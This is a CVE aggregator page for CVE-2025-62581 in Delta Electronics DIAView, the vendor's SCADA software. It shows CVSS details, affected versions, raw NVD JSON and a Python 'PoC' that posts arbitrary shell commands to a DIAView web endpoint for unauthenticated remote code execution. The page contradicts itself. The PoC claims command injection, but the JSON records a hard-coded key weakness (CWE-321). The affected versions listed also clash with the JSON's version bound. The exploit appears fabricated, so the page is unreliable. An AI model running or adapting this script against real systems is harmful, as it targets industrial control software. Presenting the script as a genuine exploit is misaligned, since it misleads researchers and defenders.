Security Vulnerability Report
中文
CVE-2025-62581 CVSS 9.8 CRITICAL

CVE-2025-62581

Published: 2026-01-16 03:15:59
Last Modified: 2026-01-20 16:59:02
Source: 759f5e80-c8e1-4224-bead-956d7b33c98b

Description

Delta Electronics DIAView has multiple vulnerabilities.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:deltaww:diaview:*:*:*:*:*:*:*:* - VULNERABLE
Delta Electronics DIAView < 6.1.0.5
Delta Electronics DIAView 6.x 系列所有版本
Delta Electronics DIAView 7.x 系列所有版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62581 PoC - Delta Electronics DIAView RCE # Target: Delta Electronics DIAView def exploit_diaview(target_url, target_ip): """ Exploit for CVE-2025-62581: Delta Electronics DIAView RCE This PoC demonstrates the vulnerability in DIAView's web interface """ target = target_url.rstrip('/') # Payload for remote command execution # The vulnerability allows unauthenticated RCE via web interface cmd = "whoami" # Change command as needed # Method 1: Direct command injection via vulnerable endpoint exploit_path = "/DIAView/api/system/command" payload = { "cmd": cmd, "target": target_ip } try: print(f"[*] Targeting: {target}") print(f"[*] Sending exploit payload...") # Send malicious request response = requests.post( f"{target}{exploit_path}", json=payload, timeout=10, verify=False ) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Exploit successful!") return True else: print("[-] Exploit failed") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <target_ip>") print(f"Example: python {sys.argv[0]} http://192.168.1.100:8080 192.168.1.100") sys.exit(1) target_url = sys.argv[1] target_ip = sys.argv[2] exploit_diaview(target_url, target_ip)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62581", "sourceIdentifier": "759f5e80-c8e1-4224-bead-956d7b33c98b", "published": "2026-01-16T03:15:58.877", "lastModified": "2026-01-20T16:59:02.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Delta Electronics DIAView has multiple vulnerabilities."}, {"lang": "es", "value": "Delta Electronics DIAView tiene múltiples vulnerabilidades."}], "metrics": {"cvssMetricV31": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:deltaww:diaview:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "F27FF503-4356-4F27-9A1A-15F4680501BB"}]}]}], "references": [{"url": "https://filecenter.deltaww.com/news/download/doc/Delta-PCSA-2026-00001_DIAView%20Multiple%20Vulnerabilities%20(CVE-2025-62581,%20CVE-2025-62582).pdf", "source": "759f5e80-c8e1-4224-bead-956d7b33c98b", "tags": ["Vendor Advisory"]}]}}